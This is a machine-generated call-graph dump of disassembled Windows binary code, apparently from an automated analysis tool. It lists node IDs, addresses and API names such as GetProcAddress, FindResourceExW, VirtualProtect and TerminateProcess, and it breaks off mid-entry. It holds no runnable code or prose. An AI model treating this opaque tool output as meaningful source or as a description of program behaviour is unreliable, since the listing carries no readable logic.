FreeLibrary 96980 8e4f59 96979->96980 96980->96885 96981->96979 96981->96980 96982->96890 96983->96895 96984->96895 96985->96895 96986->96895 96987->96895 96988->96893 96990 8e4ea8 GetProcAddress 96989->96990 96991 8e4ec6 96989->96991 96992 8e4eb8 96990->96992 96994 90e5eb 96991->96994 96992->96991 96993 8e4ebf FreeLibrary 96992->96993 96993->96991 97027 90e52a 96994->97027 96996 8e4eea 96996->96932 96996->96933 96998 8e4e6e GetProcAddress 96997->96998 96999 8e4e8d 96997->96999 97000 8e4e7e 96998->97000 97002 8e4f80 96999->97002 97000->96999 97001 8e4e86 FreeLibrary 97000->97001 97001->96999 97003 8ffe0b 22 API calls 97002->97003 97004 8e4f95 97003->97004 97079 8e5722 97004->97079 97006 8e4fa1 __fread_nolock 97007 8e50a5 97006->97007 97008 923d1d 97006->97008 97018 8e4fdc 97006->97018 97082 8e42a2 CreateStreamOnHGlobal 97007->97082 97093 95304d 74 API calls 97008->97093 97011 923d22 97013 8e511f 64 API calls 97011->97013 97012 8e50f5 40 API calls 97012->97018 97014 923d45 97013->97014 97015 8e50f5 40 API calls 97014->97015 97017 8e506e messages 97015->97017 97017->96940 97018->97011 97018->97012 97018->97017 97088 8e511f 97018->97088 97020 923d70 97019->97020 97021 8e5107 97019->97021 97115 90e8c4 97021->97115 97024 9528fe 97136 95274e 97024->97136 97026 952919 97026->96948 97030 90e536 ___BuildCatchObject 97027->97030 97028 90e544 97052 90f2d9 20 API calls __dosmaperr 97028->97052 97030->97028 97032 90e574 97030->97032 97031 90e549 97053 9127ec 26 API calls pre_c_initialization 97031->97053 97034 90e586 97032->97034 97035 90e579 97032->97035 97044 918061 97034->97044 97054 90f2d9 20 API calls __dosmaperr 97035->97054 97038 90e554 __fread_nolock 97038->96996 97039 90e58f 97040 90e5a2 97039->97040 97041 90e595 97039->97041 97056 90e5d4 LeaveCriticalSection __fread_nolock 97040->97056 97055 90f2d9 20 API calls __dosmaperr 97041->97055 97045 91806d ___BuildCatchObject 97044->97045 97057 912f5e EnterCriticalSection 97045->97057 97047 91807b 97058 9180fb 97047->97058 97051 9180ac __fread_nolock 97051->97039 97052->97031 97053->97038 97054->97038 97055->97038 97056->97038 97057->97047 97065 91811e 97058->97065 97059 918088 97071 9180b7 97059->97071 97060 918177 97061 914c7d __dosmaperr 20 API calls 97060->97061 97062 918180 97061->97062 97064 9129c8 _free 20 API calls 97062->97064 97066 918189 97064->97066 97065->97059 97065->97060 97074 90918d EnterCriticalSection 97065->97074 97075 9091a1 LeaveCriticalSection 97065->97075 97066->97059 97076 913405 11 API calls 2 library calls 97066->97076 97068 9181a8 97077 90918d EnterCriticalSection 97068->97077 97078 912fa6 LeaveCriticalSection 97071->97078 97073 9180be 97073->97051 97074->97065 97075->97065 97076->97068 97077->97059 97078->97073 97080 8ffddb 22 API calls 97079->97080 97081 8e5734 97080->97081 97081->97006 97083 8e42bc FindResourceExW 97082->97083 97087 8e42d9 97082->97087 97084 9235ba LoadResource 97083->97084 97083->97087 97085 9235cf SizeofResource 97084->97085 97084->97087 97086 9235e3 LockResource 97085->97086 97085->97087 97086->97087 97087->97018 97089 8e512e 97088->97089 97091 923d90 97088->97091 97094 90ece3 97089->97094 97093->97011 97097 90eaaa 97094->97097 97096 8e513c 97096->97018 97101 90eab6 ___BuildCatchObject 97097->97101 97098 90eac2 97110 90f2d9 20 API calls __dosmaperr 97098->97110 97100 90eae8 97112 90918d EnterCriticalSection 97100->97112 97101->97098 97101->97100 97103 90eac7 97111 9127ec 26 API calls pre_c_initialization 97103->97111 97104 90eaf4 97113 90ec0a 62 API calls 2 library calls 97104->97113 97107 90eb08 97114 90eb27 LeaveCriticalSection __fread_nolock 97107->97114 97109 90ead2 __fread_nolock 97109->97096 97110->97103 97111->97109 97112->97104 97113->97107 97114->97109 97118 90e8e1 97115->97118 97117 8e5118 97117->97024 97119 90e8ed ___BuildCatchObject 97118->97119 97120 90e900 ___scrt_fastfail 97119->97120 97121 90e92d 97119->97121 97122 90e925 __fread_nolock 97119->97122 97131 90f2d9 20 API calls __dosmaperr 97120->97131 97133 90918d EnterCriticalSection 97121->97133 97122->97117 97125 90e937 97134 90e6f8 38 API calls 4 library calls 97125->97134 97127 90e91a 97132 9127ec 26 API calls pre_c_initialization 97127->97132 97128 90e94e 97135 90e96c LeaveCriticalSection __fread_nolock 97128->97135 97131->97127 97132->97122 97133->97125 97134->97128 97135->97122 97139 90e4e8 97136->97139 97138 95275d 97138->97026 97142 90e469 97139->97142 97141 90e505 97141->97138 97143 90e478 97142->97143 97144 90e48c 97142->97144 97150 90f2d9 20 API calls __dosmaperr 97143->97150 97149 90e488 __alldvrm 97144->97149 97152 91333f 11 API calls 2 library calls 97144->97152 97146 90e47d 97151 9127ec 26 API calls pre_c_initialization 97146->97151 97149->97141 97150->97146 97151->97149 97152->97149 97156 952e7a 97153->97156 97154 8e50f5 40 API calls 97154->97156 97155 9528fe 27 API calls 97155->97156 97156->97154 97156->97155 97157 952d3b 97156->97157 97158 8e511f 64 API calls 97156->97158 97157->96955 97157->96974 97158->97156 97159->96974 97161 90e684 ___BuildCatchObject 97160->97161 97162 90e695 97161->97162 97163 90e6aa 97161->97163 97173 90f2d9 20 API calls __dosmaperr 97162->97173 97172 90e6a5 __fread_nolock 97163->97172 97175 90918d EnterCriticalSection 97163->97175 97166 90e69a 97174 9127ec 26 API calls pre_c_initialization 97166->97174 97167 90e6c6 97176 90e602 97167->97176 97170 90e6d1 97192 90e6ee LeaveCriticalSection __fread_nolock 97170->97192 97172->96981 97173->97166 97174->97172 97175->97167 97177 90e624 97176->97177 97178 90e60f 97176->97178 97184 90e61f 97177->97184 97195 90dc0b 97177->97195 97193 90f2d9 20 API calls __dosmaperr 97178->97193 97181 90e614 97194 9127ec 26 API calls pre_c_initialization 97181->97194 97184->97170 97188 90e646 97212 91862f 97188->97212 97191 9129c8 _free 20 API calls 97191->97184 97192->97172 97193->97181 97194->97184 97196 90dc1f 97195->97196 97197 90dc23 97195->97197 97201 914d7a 97196->97201 97197->97196 97198 90d955 __fread_nolock 26 API calls 97197->97198 97199 90dc43 97198->97199 97227 9159be 97199->97227 97202 914d90 97201->97202 97203 90e640 97201->97203 97202->97203 97204 9129c8 _free 20 API calls 97202->97204 97205 90d955 97203->97205 97204->97203 97206 90d961 97205->97206 97207 90d976 97205->97207 97351 90f2d9 20 API calls __dosmaperr 97206->97351 97207->97188 97209 90d966 97352 9127ec 26 API calls pre_c_initialization 97209->97352 97211 90d971 97211->97188 97213 918653 97212->97213 97214 91863e 97212->97214 97215 91868e 97213->97215 97219 91867a 97213->97219 97353 90f2c6 20 API calls __dosmaperr 97214->97353 97358 90f2c6 20 API calls __dosmaperr 97215->97358 97218 918643 97354 90f2d9 20 API calls __dosmaperr 97218->97354 97355 918607 97219->97355 97220 918693 97359 90f2d9 20 API calls __dosmaperr 97220->97359 97224 90e64c 97224->97184 97224->97191 97225 91869b 97360 9127ec 26 API calls pre_c_initialization 97225->97360 97228 9159ca ___BuildCatchObject 97227->97228 97229 9159d2 97228->97229 97230 9159ea 97228->97230 97252 90f2c6 20 API calls __dosmaperr 97229->97252 97232 915a88 97230->97232 97236 915a1f 97230->97236 97311 90f2c6 20 API calls __dosmaperr 97232->97311 97233 9159d7 97253 90f2d9 20 API calls __dosmaperr 97233->97253 97254 915147 EnterCriticalSection 97236->97254 97237 915a8d 97312 90f2d9 20 API calls __dosmaperr 97237->97312 97238 9159df __fread_nolock 97238->97196 97241 915a25 97243 915a41 97241->97243 97244 915a56 97241->97244 97242 915a95 97313 9127ec 26 API calls pre_c_initialization 97242->97313 97255 90f2d9 20 API calls __dosmaperr 97243->97255 97257 915aa9 97244->97257 97248 915a46 97256 90f2c6 20 API calls __dosmaperr 97248->97256 97250 915a51 97310 915a80 LeaveCriticalSection __wsopen_s 97250->97310 97252->97233 97253->97238 97254->97241 97255->97248 97256->97250 97258 915ad0 97257->97258 97259 915ad7 97257->97259 97262 900a8c CatchGuardHandler 5 API calls 97258->97262 97260 915adb 97259->97260 97261 915afa 97259->97261 97314 90f2c6 20 API calls __dosmaperr 97260->97314 97264 915b4b 97261->97264 97265 915b2e 97261->97265 97266 915cb1 97262->97266 97269 915b61 97264->97269 97320 919424 28 API calls __wsopen_s 97264->97320 97317 90f2c6 20 API calls __dosmaperr 97265->97317 97266->97250 97267 915ae0 97315 90f2d9 20 API calls __dosmaperr 97267->97315 97321 91564e 97269->97321 97272 915b33 97318 90f2d9 20 API calls __dosmaperr 97272->97318 97274 915ae7 97316 9127ec 26 API calls pre_c_initialization 97274->97316 97278 915ba8 97284 915c02 WriteFile 97278->97284 97285 915bbc 97278->97285 97279 915b6f 97281 915b73 97279->97281 97282 915b95 97279->97282 97280 915b3b 97319 9127ec 26 API calls pre_c_initialization 97280->97319 97302 915c69 97281->97302 97328 9155e1 GetLastError WriteConsoleW CreateFileW __wsopen_s 97281->97328 97329 91542e 45 API calls 3 library calls 97282->97329 97287 915c25 GetLastError 97284->97287 97298 915b8b 97284->97298 97288 915bf2 97285->97288 97289 915bc4 97285->97289 97287->97298 97332 9156c4 7 API calls 2 library calls 97288->97332 97292 915be2 97289->97292 97293 915bc9 97289->97293 97331 915891 8 API calls 2 library calls 97292->97331 97294 915bd2 97293->97294 97293->97302 97330 9157a3 7 API calls 2 library calls 97294->97330 97296 915be0 97296->97298 97298->97258 97301 915c45 97298->97301 97298->97302 97300 915c8e 97337 90f2c6 20 API calls __dosmaperr 97300->97337 97304 915c60 97301->97304 97305 915c4c 97301->97305 97302->97258 97336 90f2d9 20 API calls __dosmaperr 97302->97336 97335 90f2a3 20 API calls __dosmaperr 97304->97335 97333 90f2d9 20 API calls __dosmaperr 97305->97333 97308 915c51 97334 90f2c6 20 API calls __dosmaperr 97308->97334 97310->97238 97311->97237 97312->97242 97313->97238 97314->97267 97315->97274 97316->97258 97317->97272 97318->97280 97319->97258 97320->97269 97338 91f89b 97321->97338 97323 91565e 97324 915663 97323->97324 97347 912d74 38 API calls 3 library calls 97323->97347 97324->97278 97324->97279 97326 915686 97326->97324 97327 9156a4 GetConsoleMode 97326->97327 97327->97324 97328->97298 97329->97298 97330->97296 97331->97296 97332->97296 97333->97308 97334->97258 97335->97258 97336->97300 97337->97258 97339 91f8a8 97338->97339 97341 91f8b5 97338->97341 97348 90f2d9 20 API calls __dosmaperr 97339->97348 97343 91f8c1 97341->97343 97349 90f2d9 20 API calls __dosmaperr 97341->97349 97342 91f8ad 97342->97323 97343->97323 97345 91f8e2 97350 9127ec 26 API calls pre_c_initialization 97345->97350 97347->97326 97348->97342 97349->97345 97350->97342 97351->97209 97352->97211 97353->97218 97354->97224 97361 918585 97355->97361 97357 91862b 97357->97224 97358->97220 97359->97225 97360->97224 97362 918591 ___BuildCatchObject 97361->97362 97372 915147 EnterCriticalSection 97362->97372 97364 91859f 97365 9185d1 97364->97365 97366 9185c6 97364->97366 97388 90f2d9 20 API calls __dosmaperr 97365->97388 97373 9186ae 97366->97373 97369 9185cc 97389 9185fb LeaveCriticalSection __wsopen_s 97369->97389 97371 9185ee __fread_nolock 97371->97357 97372->97364 97390 9153c4 97373->97390 97375 9186c4 97403 915333 21 API calls 2 library calls 97375->97403 97377 9186be 97377->97375 97378 9186f6 97377->97378 97380 9153c4 __wsopen_s 26 API calls 97377->97380 97378->97375 97381 9153c4 __wsopen_s 26 API calls 97378->97381 97379 91871c 97382 91873e 97379->97382 97404 90f2a3 20 API calls __dosmaperr 97379->97404 97383 9186ed 97380->97383 97384 918702 CloseHandle 97381->97384 97382->97369 97387 9153c4 __wsopen_s 26 API calls 97383->97387 97384->97375 97385 91870e GetLastError 97384->97385 97385->97375 97387->97378 97388->97369 97389->97371 97391 9153d1 97390->97391 97392 9153e6 97390->97392 97405 90f2c6 20 API calls __dosmaperr 97391->97405 97398 91540b 97392->97398 97407 90f2c6 20 API calls __dosmaperr 97392->97407 97395 9153d6 97406 90f2d9 20 API calls __dosmaperr 97395->97406 97396 915416 97408 90f2d9 20 API calls __dosmaperr 97396->97408 97398->97377 97400 9153de 97400->97377 97401 91541e 97409 9127ec 26 API calls pre_c_initialization 97401->97409 97403->97379 97404->97382 97405->97395 97406->97400 97407->97396 97408->97401 97409->97400 97410 8ef7bf 97411 8efcb6 97410->97411 97412 8ef7d3 97410->97412 97505 8eaceb 23 API calls messages 97411->97505 97414 8efcc2 97412->97414 97415 8ffddb 22 API calls 97412->97415 97506 8eaceb 23 API calls messages 97414->97506 97417 8ef7e5 97415->97417 97417->97414 97418 8ef83e 97417->97418 97419 8efd3d 97417->97419 97442 8eed9d messages 97418->97442 97445 8f1310 97418->97445 97507 951155 22 API calls 97419->97507 97422 8ffddb 22 API calls 97441 8eec76 messages 97422->97441 97424 8efef7 97429 8ea8c7 22 API calls 97424->97429 97424->97442 97426 934b0b 97509 95359c 82 API calls __wsopen_s 97426->97509 97427 8ea8c7 22 API calls 97427->97441 97428 934600 97432 8ea8c7 22 API calls 97428->97432 97428->97442 97429->97442 97432->97442 97434 900242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97434->97441 97435 8efbe3 97437 934bdc 97435->97437 97435->97442 97444 8ef3ae messages 97435->97444 97436 8ea961 22 API calls 97436->97441 97510 95359c 82 API calls __wsopen_s 97437->97510 97438 9000a3 29 API calls pre_c_initialization 97438->97441 97440 934beb 97511 95359c 82 API calls __wsopen_s 97440->97511 97441->97422 97441->97424 97441->97426 97441->97427 97441->97428 97441->97434 97441->97435 97441->97436 97441->97438 97441->97440 97441->97442 97443 9001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97441->97443 97441->97444 97503 8f01e0 235 API calls 2 library calls 97441->97503 97504 8f06a0 41 API calls messages 97441->97504 97443->97441 97444->97442 97508 95359c 82 API calls __wsopen_s 97444->97508 97446 8f1376 97445->97446 97447 8f17b0 97445->97447 97448 936331 97446->97448 97449 8f1390 97446->97449 97615 900242 5 API calls __Init_thread_wait 97447->97615 97626 96709c 235 API calls 97448->97626 97452 8f1940 9 API calls 97449->97452 97451 8f17ba 97455 8f17fb 97451->97455 97616 8e9cb3 97451->97616 97456 8f13a0 97452->97456 97454 93633d 97454->97441 97460 936346 97455->97460 97462 8f182c 97455->97462 97458 8f1940 9 API calls 97456->97458 97459 8f13b6 97458->97459 97459->97455 97461 8f13ec 97459->97461 97627 95359c 82 API calls __wsopen_s 97460->97627 97461->97460 97485 8f1408 __fread_nolock 97461->97485 97623 8eaceb 23 API calls messages 97462->97623 97465 8f1839 97624 8fd217 235 API calls 97465->97624 97466 8f17d4 97622 9001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97466->97622 97469 93636e 97628 95359c 82 API calls __wsopen_s 97469->97628 97470 8f152f 97472 9363d1 97470->97472 97473 8f153c 97470->97473 97630 965745 54 API calls _wcslen 97472->97630 97475 8f1940 9 API calls 97473->97475 97477 8f1549 97475->97477 97476 8ffddb 22 API calls 97476->97485 97480 9364fa 97477->97480 97482 8f1940 9 API calls 97477->97482 97478 8f1872 97625 8ffaeb 23 API calls 97478->97625 97479 8ffe0b 22 API calls 97479->97485 97489 936369 97480->97489 97631 95359c 82 API calls __wsopen_s 97480->97631 97487 8f1563 97482->97487 97484 8eec40 235 API calls 97484->97485 97485->97465 97485->97469 97485->97470 97485->97476 97485->97479 97485->97484 97486 9363b2 97485->97486 97485->97489 97629 95359c 82 API calls __wsopen_s 97486->97629 97487->97480 97490 8ea8c7 22 API calls 97487->97490 97492 8f15c7 messages 97487->97492 97489->97441 97490->97492 97491 8f1940 9 API calls 97491->97492 97492->97478 97492->97480 97492->97489 97492->97491 97494 8f167b messages 97492->97494 97498 8e4f39 68 API calls 97492->97498 97512 94d4ce 97492->97512 97515 95f0ec 97492->97515 97524 96958b 97492->97524 97527 956ef1 97492->97527 97607 951e96 97492->97607 97611 96959f 97492->97611 97493 8f171d 97493->97441 97494->97493 97614 8fce17 22 API calls messages 97494->97614 97498->97492 97503->97441 97504->97441 97505->97414 97506->97419 97507->97442 97508->97442 97509->97442 97510->97440 97511->97442 97632 94dbbe lstrlenW 97512->97632 97637 8e7510 97515->97637 97519 95f136 97520 95f15b 97519->97520 97521 8eec40 235 API calls 97519->97521 97523 95f15f 97520->97523 97688 8e9c6e 22 API calls 97520->97688 97521->97520 97523->97492 97712 967f59 97524->97712 97526 96959b 97526->97492 97528 8ea961 22 API calls 97527->97528 97529 956f1d 97528->97529 97530 8ea961 22 API calls 97529->97530 97531 956f26 97530->97531 97532 956f3a 97531->97532 97981 8eb567 39 API calls 97531->97981 97534 8e7510 53 API calls 97532->97534 97537 956f57 _wcslen 97534->97537 97535 956fbc 97538 8e7510 53 API calls 97535->97538 97536 9570bf 97539 8e4ecb 94 API calls 97536->97539 97537->97535 97537->97536 97606 9570e9 97537->97606 97540 956fc8 97538->97540 97541 9570d0 97539->97541 97544 8ea8c7 22 API calls 97540->97544 97549 956fdb 97540->97549 97542 9570e5 97541->97542 97545 8e4ecb 94 API calls 97541->97545 97543 8ea961 22 API calls 97542->97543 97542->97606 97546 95711a 97543->97546 97544->97549 97545->97542 97547 8ea961 22 API calls 97546->97547 97551 957126 97547->97551 97548 957027 97550 8e7510 53 API calls 97548->97550 97549->97548 97552 957005 97549->97552 97555 8ea8c7 22 API calls 97549->97555 97553 957034 97550->97553 97554 8ea961 22 API calls 97551->97554 97982 8e33c6 97552->97982 97558 957047 97553->97558 97559 95703d 97553->97559 97560 95712f 97554->97560 97555->97552 97557 95700f 97561 8e7510 53 API calls 97557->97561 97991 94e199 GetFileAttributesW 97558->97991 97562 8ea8c7 22 API calls 97559->97562 97564 8ea961 22 API calls 97560->97564 97565 95701b 97561->97565 97562->97558 97567 957138 97564->97567 97568 8e6350 22 API calls 97565->97568 97566 957050 97569 957063 97566->97569 97572 8e4c6d 22 API calls 97566->97572 97570 8e7510 53 API calls 97567->97570 97568->97548 97571 8e7510 53 API calls 97569->97571 97579 957069 97569->97579 97573 957145 97570->97573 97574 9570a0 97571->97574 97572->97569 97818 8e525f 97573->97818 97992 94d076 57 API calls 97574->97992 97576 957166 97860 8e4c6d 97576->97860 97579->97606 97581 9571a9 97583 8ea8c7 22 API calls 97581->97583 97582 8e4c6d 22 API calls 97584 957186 97582->97584 97585 9571ba 97583->97585 97584->97581 97587 8e6b57 22 API calls 97584->97587 97863 8e6350 97585->97863 97589 95719b 97587->97589 97592 8e6b57 22 API calls 97589->97592 97590 8e6350 22 API calls 97591 9571d6 97590->97591 97593 8e6350 22 API calls 97591->97593 97592->97581 97594 9571e4 97593->97594 97595 8e7510 53 API calls 97594->97595 97596 9571f0 97595->97596 97872 94d7bc 97596->97872 97598 957201 97599 94d4ce 4 API calls 97598->97599 97600 95720b 97599->97600 97601 8e7510 53 API calls 97600->97601 97604 957239 97600->97604 97602 957229 97601->97602 97926 952947 97602->97926 97605 8e4f39 68 API calls 97604->97605 97605->97606 97606->97492 97608 951e9f 97607->97608 97610 951ea4 97607->97610 98079 950f67 97608->98079 97610->97492 97612 967f59 120 API calls 97611->97612 97613 9695af 97612->97613 97613->97492 97614->97494 97615->97451 97617 8e9cc2 _wcslen 97616->97617 97618 8ffe0b 22 API calls 97617->97618 97619 8e9cea __fread_nolock 97618->97619 97620 8ffddb 22 API calls 97619->97620 97621 8e9d00 97620->97621 97621->97466 97622->97455 97623->97465 97624->97478 97625->97478 97626->97454 97627->97489 97628->97489 97629->97489 97630->97487 97631->97489 97633 94d4d5 97632->97633 97634 94dbdc GetFileAttributesW 97632->97634 97633->97492 97634->97633 97635 94dbe8 FindFirstFileW 97634->97635 97635->97633 97636 94dbf9 FindClose 97635->97636 97636->97633 97638 8e7525 97637->97638 97639 8e7522 97637->97639 97640 8e752d 97638->97640 97641 8e755b 97638->97641 97660 8e9e90 97639->97660 97689 9051c6 26 API calls 97640->97689 97642 9250f6 97641->97642 97644 8e756d 97641->97644 97651 92500f 97641->97651 97692 905183 26 API calls 97642->97692 97690 8ffb21 51 API calls 97644->97690 97645 8e753d 97650 8ffddb 22 API calls 97645->97650 97647 92510e 97647->97647 97652 8e7547 97650->97652 97654 8ffe0b 22 API calls 97651->97654 97659 925088 97651->97659 97653 8e9cb3 22 API calls 97652->97653 97653->97639 97655 925058 97654->97655 97656 8ffddb 22 API calls 97655->97656 97657 92507f 97656->97657 97658 8e9cb3 22 API calls 97657->97658 97658->97659 97691 8ffb21 51 API calls 97659->97691 97693 8e6270 97660->97693 97662 8e9fd2 97699 8ea4a1 22 API calls __fread_nolock 97662->97699 97664 8e9fec 97664->97519 97667 92f699 97676 8ffddb 22 API calls 97667->97676 97668 92f7c4 97709 9496e2 84 API calls __wsopen_s 97668->97709 97670 8ea405 97670->97664 97711 9496e2 84 API calls __wsopen_s 97670->97711 97671 8ea4a1 22 API calls 97687 8e9eb5 97671->97687 97673 8ea6c3 22 API calls 97673->97687 97675 92f7d2 97710 8ea4a1 22 API calls __fread_nolock 97675->97710 97678 92f754 97676->97678 97680 8ffe0b 22 API calls 97678->97680 97679 92f7e8 97679->97664 97681 8ea12c __fread_nolock 97680->97681 97681->97668 97681->97670 97684 8eaec9 22 API calls 97685 8ea0db CharUpperBuffW 97684->97685 97705 8ea673 22 API calls 97685->97705 97687->97662 97687->97667 97687->97668 97687->97670 97687->97671 97687->97673 97687->97681 97687->97684 97698 8e4573 41 API calls _wcslen 97687->97698 97700 8ea587 97687->97700 97706 8e48c8 23 API calls 97687->97706 97707 8e49bd 22 API calls __fread_nolock 97687->97707 97708 8ea673 22 API calls 97687->97708 97688->97523 97689->97645 97690->97645 97691->97642 97692->97647 97694 8ffe0b 22 API calls 97693->97694 97695 8e6295 97694->97695 97696 8ffddb 22 API calls 97695->97696 97697 8e62a3 97696->97697 97697->97687 97698->97687 97699->97664 97701 8ea59d 97700->97701 97704 8ea598 __fread_nolock 97700->97704 97702 92f80f 97701->97702 97703 8ffe0b 22 API calls 97701->97703 97703->97704 97704->97687 97705->97687 97706->97687 97707->97687 97708->97687 97709->97675 97710->97679 97711->97664 97713 8e7510 53 API calls 97712->97713 97714 967f90 97713->97714 97736 967fd5 messages 97714->97736 97750 968cd3 97714->97750 97716 968281 97717 96844f 97716->97717 97721 96828f 97716->97721 97791 968ee4 60 API calls 97717->97791 97720 96845e 97720->97721 97722 96846a 97720->97722 97763 967e86 97721->97763 97722->97736 97723 8e7510 53 API calls 97740 968049 97723->97740 97728 9682c8 97778 8ffc70 97728->97778 97731 968302 97785 8e63eb 22 API calls 97731->97785 97732 9682e8 97784 95359c 82 API calls __wsopen_s 97732->97784 97735 9682f3 GetCurrentProcess TerminateProcess 97735->97731 97736->97526 97737 968311 97786 8e6a50 22 API calls 97737->97786 97739 96832a 97748 968352 97739->97748 97787 8f04f0 22 API calls 97739->97787 97740->97716 97740->97723 97740->97736 97782 94417d 22 API calls __fread_nolock 97740->97782 97783 96851d 42 API calls _strftime 97740->97783 97742 9684c5 97742->97736 97744 9684d9 FreeLibrary 97742->97744 97743 968341 97788 968b7b 75 API calls 97743->97788 97744->97736 97748->97742 97789 8f04f0 22 API calls 97748->97789 97790 8eaceb 23 API calls messages 97748->97790 97792 968b7b 75 API calls 97748->97792 97751 8eaec9 22 API calls 97750->97751 97752 968cee CharLowerBuffW 97751->97752 97793 948e54 97752->97793 97756 8ea961 22 API calls 97757 968d2a 97756->97757 97800 8e6d25 97757->97800 97759 968d3e 97760 8e93b2 22 API calls 97759->97760 97762 968d48 _wcslen 97760->97762 97761 968e5e _wcslen 97761->97740 97762->97761 97813 96851d 42 API calls _strftime 97762->97813 97764 967ea1 97763->97764 97768 967eec 97763->97768 97765 8ffe0b 22 API calls 97764->97765 97766 967ec3 97765->97766 97767 8ffddb 22 API calls 97766->97767 97766->97768 97767->97766 97769 969096 97768->97769 97770 9692ab messages 97769->97770 97777 9690ba _strcat _wcslen 97769->97777 97770->97728 97771 8eb6b5 39 API calls 97771->97777 97772 8eb567 39 API calls 97772->97777 97773 8eb38f 39 API calls 97773->97777 97774 8e7510 53 API calls 97774->97777 97775 90ea0c 21 API calls ___std_exception_copy 97775->97777 97777->97770 97777->97771 97777->97772 97777->97773 97777->97774 97777->97775 97817 94efae 24 API calls _wcslen 97777->97817 97779 8ffc85 97778->97779 97780 8ffd1d VirtualProtect 97779->97780 97781 8ffceb 97779->97781 97780->97781 97781->97731 97781->97732 97782->97740 97783->97740 97784->97735 97785->97737 97786->97739 97787->97743 97788->97748 97789->97748 97790->97748 97791->97720 97792->97748 97794 948e74 _wcslen 97793->97794 97795 948f63 97794->97795 97797 948ea9 97794->97797 97798 948f68 97794->97798 97795->97756 97795->97762 97797->97795 97814 8fce60 41 API calls 97797->97814 97798->97795 97815 8fce60 41 API calls 97798->97815 97801 8e6d34 97800->97801 97802 8e6d91 97800->97802 97801->97802 97804 8e6d3f 97801->97804 97803 8e93b2 22 API calls 97802->97803 97810 8e6d62 __fread_nolock 97803->97810 97805 8e6d5a 97804->97805 97806 924c9d 97804->97806 97816 8e6f34 22 API calls 97805->97816 97808 8ffddb 22 API calls 97806->97808 97809 924ca7 97808->97809 97811 8ffe0b 22 API calls 97809->97811 97810->97759 97812 924cda 97811->97812 97813->97761 97814->97797 97815->97798 97816->97810 97817->97777 97819 8ea961 22 API calls 97818->97819 97820 8e5275 97819->97820 97821 8ea961 22 API calls 97820->97821 97822 8e527d 97821->97822 97823 8ea961 22 API calls 97822->97823 97824 8e5285 97823->97824 97825 8ea961 22 API calls 97824->97825 97826 8e528d 97825->97826 97827 923df5 97826->97827 97828 8e52c1 97826->97828 97829 8ea8c7 22 API calls 97827->97829 97830 8e6d25 22 API calls 97828->97830 97831 923dfe 97829->97831 97832 8e52cf 97830->97832 97833 8ea6c3 22 API calls 97831->97833 97834 8e93b2 22 API calls 97832->97834 97837 8e5304 97833->97837 97835 8e52d9 97834->97835 97835->97837 97838 8e6d25 22 API calls 97835->97838 97836 8e5349 97840 8e6d25 22 API calls 97836->97840 97837->97836 97839 8e5325 97837->97839 97849 923e20 97837->97849 97841 8e52fa 97838->97841 97839->97836 97844 8e4c6d 22 API calls 97839->97844 97843 8e535a 97840->97843 97842 8e93b2 22 API calls 97841->97842 97842->97837 97845 8e5370 97843->97845 97850 8ea8c7 22 API calls 97843->97850 97847 8e5332 97844->97847 97846 8e5384 97845->97846 97853 8ea8c7 22 API calls 97845->97853 97851 8e538f 97846->97851 97856 8ea8c7 22 API calls 97846->97856 97847->97836 97855 8e6d25 22 API calls 97847->97855 97848 8e6b57 22 API calls 97852 923ee0 97848->97852 97849->97848 97850->97845 97854 8e539a 97851->97854 97857 8ea8c7 22 API calls 97851->97857 97852->97836 97858 8e4c6d 22 API calls 97852->97858 97993 8e49bd 22 API calls __fread_nolock 97852->97993 97853->97846 97854->97576 97855->97836 97856->97851 97857->97854 97858->97852 97861 8eaec9 22 API calls 97860->97861 97862 8e4c78 97861->97862 97862->97581 97862->97582 97864 924a51 97863->97864 97865 8e6362 97863->97865 98004 8e4a88 22 API calls __fread_nolock 97864->98004 97994 8e6373 97865->97994 97868 8e636e 97868->97590 97869 924a67 97870 924a5b 97870->97869 97871 8ea8c7 22 API calls 97870->97871 97871->97869 97873 94d7d8 97872->97873 97874 94d7f3 97873->97874 97875 94d7dd 97873->97875 97876 8ea961 22 API calls 97874->97876 97877 8ea8c7 22 API calls 97875->97877 97925 94d7ee 97875->97925 97878 94d7fb 97876->97878 97877->97925 97879 8ea961 22 API calls 97878->97879 97880 94d803 97879->97880 97881 8ea961 22 API calls 97880->97881 97882 94d80e 97881->97882 97883 8ea961 22 API calls 97882->97883 97884 94d816 97883->97884 97885 8ea961 22 API calls 97884->97885 97886 94d81e 97885->97886 97887 8ea961 22 API calls 97886->97887 97888 94d826 97887->97888 97889 8ea961 22 API calls 97888->97889 97890 94d82e 97889->97890 97891 8ea961 22 API calls 97890->97891 97892 94d836 97891->97892 97893 8e525f 22 API calls 97892->97893 97894 94d84d 97893->97894 97895 8e525f 22 API calls 97894->97895 97896 94d866 97895->97896 97897 8e4c6d 22 API calls 97896->97897 97898 94d872 97897->97898 97899 94d885 97898->97899 97900 8e93b2 22 API calls 97898->97900 97901 8e4c6d 22 API calls 97899->97901 97900->97899 97902 94d88e 97901->97902 97903 94d89e 97902->97903 97904 8e93b2 22 API calls 97902->97904 97905 94d8b0 97903->97905 97906 8ea8c7 22 API calls 97903->97906 97904->97903 97907 8e6350 22 API calls 97905->97907 97906->97905 97908 94d8bb 97907->97908 98005 94d978 22 API calls 97908->98005 97910 94d8ca 98006 94d978 22 API calls 97910->98006 97912 94d8dd 97913 8e4c6d 22 API calls 97912->97913 97914 94d8e7 97913->97914 97915 94d8ec 97914->97915 97916 94d8fe 97914->97916 97917 8e33c6 22 API calls 97915->97917 97918 8e4c6d 22 API calls 97916->97918 97919 94d8f9 97917->97919 97920 94d907 97918->97920 97922 8e6350 22 API calls 97919->97922 97921 94d925 97920->97921 97924 8e33c6 22 API calls 97920->97924 97923 8e6350 22 API calls 97921->97923 97922->97921 97923->97925 97924->97919 97925->97598 97927 952954 __wsopen_s 97926->97927 97928 8ffe0b 22 API calls 97927->97928 97929 952971 97928->97929 97930 8e5722 22 API calls 97929->97930 97931 95297b 97930->97931 97932 95274e 27 API calls 97931->97932 97933 952986 97932->97933 97934 8e511f 64 API calls 97933->97934 97935 95299b 97934->97935 97936 952a6c 97935->97936 97937 9529bf 97935->97937 97938 952e66 75 API calls 97936->97938 97939 952e66 75 API calls 97937->97939 97954 952a38 97938->97954 97940 9529c4 97939->97940 97944 952a75 messages 97940->97944 98020 90d583 26 API calls 97940->98020 97942 8e50f5 40 API calls 97943 